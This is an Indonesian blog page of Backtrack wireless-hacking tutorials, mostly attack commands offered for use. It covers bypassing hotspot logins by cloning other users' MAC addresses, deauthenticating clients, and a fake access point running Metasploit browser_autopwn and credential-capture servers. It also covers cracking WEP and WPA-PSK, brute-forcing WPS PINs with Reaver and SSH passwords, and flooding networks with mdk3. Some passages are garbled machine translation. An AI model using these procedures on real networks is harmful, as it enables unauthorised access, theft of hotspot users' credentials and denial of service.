Kamis, 29 Agustus 2013

Backtrack: Instalasi Driver MadWiFi

Bagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.

Instalasi kebutuhan untuk compile
 
# apt-get install build-essential perl

Download source code madwifi dari
http://ath5k.org/wiki/MadWifi
http://sourceforge.net/project/showfiles.php?group_id=82936
Copy dan buka source code
 
# cp madwifi-0.9.4.tar.gz /usr/local/src/
# cd /usr/local/src
# tar zxvf madwifi-0.9.4.tar.gz
# cd /usr/local/src/madwifi-0.9.4

Compile & Install MadWifi Driver
 
# make
# make install

Load module
 
# modprobe ath_pci

Bypassing Mikrotik Access Point Login

Saya ingin memulai dengan sebuah pertanyaan sederhana di sini ... 'Seberapa aman adalah Hotspot area Anda?' .. Dalam beberapa kasus, ada hal bosan ketika kami sampai di jalur akses dengan form login. Mengapa kita harus mengisi formulir ini jika kita bisa meninggal? Dan pertanyaan kedua adalah 'Bagaimana untuk memotong keamanan ini mikrotik?'

Jadi, mari kita mulai:

1. Mari kita mengenali apa menggunakan metoda yang digunakan:

Ini merupakan langkah penting, kecuali Anda sudah tahu apa metode keamanan yang telah digunakan oleh administrator. Jika administrator menggunakan metode Aunthentification, yang harus Anda lakukan adalah:

  •      Dapatkan terhubung ke jaringan
  •      Pastikan Anda mendapat alamat IP dan alamat DNS
  •      Jalankan "NetCut" alat (Untuk menang *** s), atau "wireshark (untuk linux" kemudian memindai seluruh jaringan Anda.
  •      Lihatlah klien yang sudah terhubung ke jaringan. Salin alamat MAC ke alamat MAC Anda.
  •      Restart jaringan, dan kemudian kembali terhubung ke jaringan
  •      ... Itu saja ..!

2. Jika administrator menggunakan metode Otorisasi, yang harus Anda lakukan adalah:

  •      Cobalah untuk mengikuti metode langkah pertama. Jika Anda masih tidak bisa browsing, menggunakan wireshark untuk mendengarkan setiap komunikasi di jaringan. Anda dapat mencoba mengubah alamat MAC Anda untuk terhubung klien alamat MAC sebelum menghubungkan jaringan, atau Anda dapat mencoba untuk mengedit konfigurasi alamat IP secara manual, termasuk konfigurasi DNS.
  •      Jika masih tidak bekerja. Cobalah untuk melepas klien sudah terhubung bahwa Anda telah menyalin alamat MAC.
  •      Masih tidak bekerja?? Wow .. admin harus menjadi ahli!

3. Jika admin menggunakan metode Akuntansi, yang harus Anda lakukan adalah:

  •      Coba langkah pertama. Kemudian jalankan wireshark
  •      Diklasifikasikan klien IP (dalam hal admin membuat kelas yang berbeda untuk setiap klien, biasanya dalam metode Akuntansi, ada seorang pelanggan VIP)
  •      Cobalah untuk mengubah alamat MAC Anda untuk masing-masing kelas klien. Langkah ini digunakan untuk attemp kita bisa memiliki fasilitas pelanggan VIP.
Jadi, itu semua orang ... Semoga Anda dapat mencoba ini ..
Jika Anda seorang administrator, Anda harus menambal ini. Anda dapat membaca bagaimana untuk di http://whitesecure.com




Menemukan Hidden SSID

Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet
 
# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID
 
tampilan kismet, warna biru adalah Hidden SSID

Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal lumayan tinggi.

Pertama, scanning frekuensi pada WLAN di eth1
 
# airmon-ng stop eth1
# airmon-ng start eth1
# airodump-ng eth1

Jalankan airodump-ng terus menerus di sebuah Windows.

Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91 melalui eth1
 
# aireplay-ng --deauth 1 -a 00:11:6B:60:86:91 eth1

Nanti akan keluar BSSID di airodump-ng

Teknik Melewati Pembatasan MAC Address

Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang diijinkan lewat oleh AP menggunakan Kismet adalah
 
# kismet

Lakukan
 
space
S            - untuk men-sort
S            - untuk men-sort terhadap SSID
Panah Bawah  - Letakan di SSID AP yang kita inginkan.
ENTER        - detail AP
C            - lihat siapa saja client AP tersebut

Pastikan airmon tidak aktif di WLAN eth1
 
# airmon-ng stop eth1

Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP
 
# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain
 
# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address
 
# macchanger -r eth1

Teknik Man-in-The-Middle Attack / FakeAP

Versi Singkat membuat Fake AP

airbase-ng -e "Free WiFi" -P -C 30 -v wlan0


Versi lengkap untuk MiTM attack

Siapkan software yang di butuhkan
sudo apt-get install subversion

Summary perintah yang digunakan
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng/
make
make install
sudo su -
airmon-ng start wlan0
airbase-ng -e "Evil Wireless" -v mon0 &
ifconfig at0 10.0.0.1 netmask 255.255.255.0
apt-get install dhcp3-server
vi /etc/dhcp3/evil-wireless.conf
option domain-name-servers 10.0.0.1;
  
default-lease-time 60;
max-lease-time 72;
 
ddns-update-style none;
 
authoritative;
 
log-facility local7;
 
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
dhcpd3 -cf /etc/dhcp3/evil-wireless.conf
ifconfig mon0 mtu 1800
ifconfig at0 mtu 1400
svn co http://metasploit.com/svn/framework3/trunk msf3    (butuh waktu lama & bandwidth)

Menggunakan gems rupanya rewel & belum stabil :( ..
apt-get install rubygems
gem install activerecord sqlite3-ruby  (butuh waktu lama & bandwidth)
vi evilwireless.rc
load db_sqlite3
db_create /root/evilwireless.db
 
use auxiliary/server/browser_autopwn
 
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
 
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
 
run
 
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
 
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
 
use auxiliary/server/capture/ftp
run
 
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
 
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
 
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
 
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
 
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run 
./msfconsole -r evilwireless.rc

hacking WPA

Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya. 

Misalnya,
 
BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2

 
Untuk memudahkan operasi ada baiknya melakukan di shell
 
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
 
airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut
 
Interface Chipset  Driver
wlan0  Intel 3945ABG iwl3945 - [phy0]
    (monitor mode enabled on mon0)
 
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
 
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
 
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
 
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Dimana
 
-a MAC AP
-c MAC client

Menjebol WEP Menggunakan Airodump dan Aircrack

Yang perlu diingat ada tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2

Untuk memudahkan operasi ada baiknya melakukan di shell
 
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1
 
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
 
airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut
 
Interface Chipset  Driver
wlan0  Intel 3945ABG iwl3945 - [phy0]
    (monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
 
airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
 
airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrack untuk mengcrack WEP
 
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs 

misalnya
 
# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs 
# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs 

Bisa juga menggunakan perintah
 
# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs 

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.



Reaver: Hint dan Tip

Basic Usage

Pertama, pastikan kartu nirkabel Anda dalam mode monitor:
 
# airmon-ng start wlan0
 
Untuk menjalankan Reaver, Anda harus menentukan BSSID dari AP target dan nama antarmuka mode monitor (biasanya 'mon0', bukan 'wlan0', meskipun ini akan bervariasi berdasarkan wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05
 
Anda mungkin akan juga ingin menggunakan-vv untuk mendapatkan verbose info tentang kemajuan Reaver ini:
 
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

 

Speeding Up the Attack

Secara default, Reaver memiliki delay 1 detik antara upaya pin. Anda dapat menonaktifkan penundaan ini dengan menambahkan '-d 0' pada baris perintah, tetapi beberapa AP mungkin tidak seperti itu:
 
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Pilihan lain yang dapat mempercepat serangan adalah - dh-kecil. Opsi ini memerintahkan Reaver menggunakan nomor Diffie-Hellman rahasia kecil dalam rangka untuk mengurangi beban komputasi pada target AP:
 
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

 

MAC Spoofing


Dalam beberapa kasus, Anda mungkin ingin / perlu spoof alamat MAC Anda. Reaver mendukung MAC spoofing dengan opsi - mac, tetapi Anda harus memastikan bahwa Anda telah palsu MAC Anda dengan benar dalam rangka untuk itu untuk bekerja.

Mengubah alamat MAC dari virtual memantau antarmuka mode (biasanya bernama mon0) TIDAK AKAN BEKERJA. Anda harus mengubah alamat MAC antarmuka fisik kartu nirkabel Anda. Sebagai contoh:


# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

 

Default Pins

Telah dilaporkan bahwa beberapa model / vendor / ISP semua datang dikonfigurasi dengan pin standar. Pin yang umum adalah 12345670, 00005678, 01230000, dll Reaver mencoba pin standar yang dikenal pertama. Kesalahan dan Peringatan

Hal ini tidak jarang untuk mendapatkan beberapa kesalahan atau peringatan selama serangan, biasanya terkait dengan menerima timeout atau rusak WPS pesan. Anda bahkan bisa mendapatkan peringatan ini selama beberapa menit sampai jumlah pin mulai incrementing lagi.

Namun, jika jumlah pin Anda tidak kenaikan sama sekali, atau kenaikan hanya sesekali dengan banyak kesalahan / peringatan, jawablah pertanyaan berikut ini:
  • Apakah target dukungan WPS AP dan WPS diaktifkan?
  • Apakah Anda menempatkan kartu nirkabel Anda ke modus monitor?
  • Apakah Anda menentukan antarmuka mode monitor dengan opsi-i?
  • Apakah Anda memiliki sinyal yang baik dari AP?
Jika Anda masih mengalami masalah, Anda dapat melihat apakah masalah Anda sudah terdaftar dalam pelacak isu proyek. Jika tidak, menciptakan masalah baru, dan pastikan untuk menyertakan:
  • Distro Linux, versi distro, dan arsitektur (32 bit atau 64bit?)
  • Wireless card and driver
  • File pcap menunjukkan masalah ini, jika mungkin

Reaver untuk Penetrasi Keamanan Wireless

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya diperuntukkan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan sendiri dengan aparat penegak hukum.

Sumber: http://code.google.com/p/reaver-wps/wiki/README

 

INSTALLATION

Reaver is only supported on the Linux platform, requires the libpcap and libsqlite3 libraries, and can be built and installed by running:
$ ./configure
$ make
# make install
To remove everything installed/created by Reaver:
# make distclean

USAGE

Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver, unless explicitly specified on the command line:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious" activity is detected. By default when a locked state is detected, Reaver will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check can be increased or decreased to any non-negative integer value:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver will auto-detect if an AP properly responds with NACKs or not:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but can be enabled for those APs that need it:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

 

Backtrack: Scanning HotSpot

Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.



iwlist
Cara yang paling sederhana adalah menggunakan perintah
# iwlist scanning


Kismet
cara yang lebih rumit menggunakan kismet
# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
source=none,none,addme --> source=ath5k, ath0, athsource
Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet
# kismet


airodump
Mematikan mode monitor di WLAN interface
# airmon-ng stop wlan0
Mengaktifkan mode monitor di WLAN interface
# airmon-ng start wlan0 1
Akan keluar kira-kira
Interface Chipset  Driver
wlan0  Intel 3945ABG iwl3945 - [phy0]
    (monitor mode enabled on mon2)
mon0  Intel 3945ABG iwl3945 - [phy0]
mon1  Intel 3945ABG iwl3945 - [phy0]

Scanning
# airodump-ng mon0

Backtrack: Menjebol SSH secara BruteForce

Menjebol akses SSH menggunakan sniffing lumayan susah. Oleh karenanya ada mencoba menjebol SSH mungkin dapat menggunakan cara kasar dengan mencoba password satu per satu. Perintah yang dapat digunakan adalah
python brutessh.py -h targethost -u user -d passwordict
Contoh
python brutessh.py -h 192.168.0.2 -u namauser -d /pentest/passwords/wordlists/darkc0de.lst

Backtrack : Install Aplikasi pendukung Wireless Hacking

Beberapa paket software yang dibutuhkan
# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev libnet1 libnet1-dev libdnet \
libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto python-psyco dhcp3-server bind9 apache2
Install beberapa aplikasi yang lebih fokus untuk hacking wireless
# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng
Pada Ubuntu 9.04 aplikasi yang di instalasi adalah
# apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ng
Download source code aplikasi berikut jika diperlukan
# cd /usr/local/src
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon
# wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz
# wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz
# wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz
Bagi pengguna Atheros & RT73 perlu mendownload
# wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gz
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2



Compile & Install Lorcon
# cd /usr/local/src/lorcon/
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install
Sebaiknya dilakukan melalui airpwn seperti di bawah ini

Compile & Install Airpwn
# cd /usr/local/src/
# tar zxvf airpwn-1.3.tgz
# cd /usr/local/src/airpwn-1.3
# tar zxvf lorcon-current.tgz
# cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon
# cd /usr/local/src/airpwn-1.3/lorcon
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install
Langkah selanjutnya kita perlu menginstall source code kernel:( ...
# cd /usr/local/src/airpwn-1.3
# ./configure
# make
# make install


Install Wifitap & Airsnarf
# cd /usr/local/src/
# tar zxvf wifitap-0.4.0.tgz 

Backtrack: Tutorial cracking WPA PSK

Sebenarnya Tutorial ini sudah sangat basi bagi kaum backtrackers, tapi ini khusus ditujukan kepada newbie yang ingin tahu tentang cara menghacking jaringan infrastructure dengan encryp WPA-PSK..agar tidak ada pertanyaan yang di ulang2 seperti yang terjadi di area pertanyaan pemul. Semoga tutorial ini dapat membantu.


  • buka konsole dan ketikkan perintah :
# ifconfig -a
  • Aktifkan interface wlan0
# ifconfig wlan0 up
  • Membuat virtual interface untuk mode monitoring. Biasanya akan dibuat interface virtual mon0.
# airmon-ng start wlan0 [/color]
  • Monitoring jaringan
 
 
# airodump-ng mon0
[color=blue]mon0 adalah interface virtual hasil dari airmon-ng tadi
hasil dari airodump-ng mon0
  • Monitor jaringan khusus untuk bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘test’


# airodump-ng -w test –channel 11 –bssid 00904c910001 mon0
  • Menggunakan aireplay-ng untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
 
 
# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth [/list]
  • setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah 


# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt
 
inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt[/color]
sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya…jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.

Tool mdk3 Pada Backtrak 5r3

Buka terminal

ketik : airmon-ng start wlan0 /mengaktifkan aircrack
ketik : airodump-ng mon0      /untuk melihat SSID(mac address) user yang online

SSID/MAC ADDRESS

3d:24:11:a3:4d:13  12 jdv;ahdv  HOTSPOT GRANINNAMUARO



SSID UPI             SSID USER

3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO
3d:24:11:a3:4d:13  10:2d:4a:16:c3:1a  12 jdv;ahdv  GRANINNAMUARO






ketik : mdk3 mon0 d 3d:24:11:a3:4d:13 

Hampir sama dengan netcut akan tetapi lebih berbahaya dan menakutkan.